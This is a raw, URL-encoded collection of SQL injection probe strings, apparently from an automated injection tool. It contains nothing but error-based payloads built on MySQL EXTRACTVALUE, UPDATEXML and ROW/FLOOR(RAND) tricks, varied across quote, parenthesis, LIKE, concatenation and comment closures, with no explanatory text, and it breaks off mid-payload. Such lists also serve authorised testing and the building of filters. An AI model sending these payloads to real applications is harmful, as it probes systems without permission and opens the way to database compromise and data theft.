1%27%29%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%28%27Jqrw%27%20LIKE%20%27Jqrw 1%27%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%27XteN%27%20LIKE%20%27XteN 1%22%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%22fUwE%22%3D%22fUwE 1%22%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%22OYEb%22%3D%22OYEb 1%22%29%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%28%22IWtk%22%3D%22IWtk 1%22%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%22Tckb%22%3D%22Tckb 1%22%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%22pRYM%22%20LIKE%20%22pRYM 1%22%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%22jyHX%22%20LIKE%20%22jyHX 1%22%29%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%28%22Tkpb%22%20LIKE%20%22Tkpb 1%22%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%22ICXz%22%20LIKE%20%22ICXz 1%25%27%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%28%27johN%27%3D%27johN 1%00%27%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20AND%20%27MyYO%27%3D%27MyYO 1%27%29%20WHERE%203355%3D3355%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%22%29%20WHERE%209385%3D9385%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%27%20WHERE%204091%3D4091%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%22%20WHERE%207251%3D7251%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20--%20 1%27%7C%7C%28SELECT%20%27aQKt%27%20FROM%20DUAL%20WHERE%209363%3D9363%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27rbCn%27%20WHERE%208203%3D8203%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20%29%7C%7C%27 1%27%2B%28SELECT%20oAci%20WHERE%205767%3D5767%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20%29%2B%27 1%27%2B%28SELECT%20%27pPqX%27%20WHERE%202376%3D2376%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20EXTRACTVALUE%288591%2CCONCAT%280x5c%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%288591%3D8591%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%29%20%23 1%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29 1%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%282726%3D2726 1%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%285935%3D5935 1%29%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%28%288261%3D8261 1%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29 1%29%20WHERE%209138%3D9138%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20--%20 1%20WHERE%207556%3D7556%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20--%20 1%27%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29 1%27%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29 1%22%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29 1%27%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%27HWCZ%27%3D%27HWCZ 1%27%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%28%27GrZc%27%3D%27GrZc 1%27%29%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%28%28%27Kyjs%27%3D%27Kyjs 1%27%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%27DCkR%27%3D%27DCkR 1%27%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%27hPXs%27%20LIKE%20%27hPXs 1%27%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%28%27RBPp%27%20LIKE%20%27RBPp 1%27%29%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%28%28%27lZTQ%27%20LIKE%20%27lZTQ 1%27%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%27gCFY%27%20LIKE%20%27gCFY 1%22%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%22tLJF%22%3D%22tLJF 1%22%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%28%22uJLV%22%3D%22uJLV 1%22%29%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%28%28%22TgBb%22%3D%22TgBb 1%22%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%22YOsU%22%3D%22YOsU 1%22%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%22sPss%22%20LIKE%20%22sPss 1%22%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%28%22VLod%22%20LIKE%20%22VLod 1%22%29%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%28%28%22opld%22%20LIKE%20%22opld 1%22%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%22hCcc%22%20LIKE%20%22hCcc 1%25%27%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%28%27JfbE%27%3D%27JfbE 1%00%27%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20AND%20%27BXhy%27%3D%27BXhy 1%27%29%20WHERE%201514%3D1514%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20--%20 1%22%29%20WHERE%203502%3D3502%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20--%20 1%27%20WHERE%209613%3D9613%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20--%20 1%22%20WHERE%206357%3D6357%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20--%20 1%27%7C%7C%28SELECT%20%27bLgN%27%20FROM%20DUAL%20WHERE%208463%3D8463%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27Iggn%27%20WHERE%206264%3D6264%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20%29%7C%7C%27 1%27%2B%28SELECT%20mNnU%20WHERE%206725%3D6725%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20%29%2B%27 1%27%2B%28SELECT%20%27hIkc%27%20WHERE%207943%3D7943%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20UPDATEXML%283793%2CCONCAT%280x2e%2C0x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283793%3D3793%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%29%2C5029%29%20%23 1%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29 1%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%286412%3D6412 1%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%282819%3D2819 1%29%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%28%283795%3D3795 1%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29 1%29%20WHERE%201424%3D1424%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20--%20 1%20WHERE%206397%3D6397%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20--%20 1%27%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29 1%27%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29 1%22%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29 1%27%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%27KAwo%27%3D%27KAwo 1%27%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27qDZy%27%3D%27qDZy 1%27%29%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27jxeo%27%3D%27jxeo 1%27%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%27TJeU%27%3D%27TJeU 1%27%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%27dkPA%27%20LIKE%20%27dkPA 1%27%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27FzLX%27%20LIKE%20%27FzLX 1%27%29%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27AZdK%27%20LIKE%20%27AZdK 1%27%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%27sNqg%27%20LIKE%20%27sNqg 1%22%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%22ahcL%22%3D%22ahcL 1%22%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22InRk%22%3D%22InRk 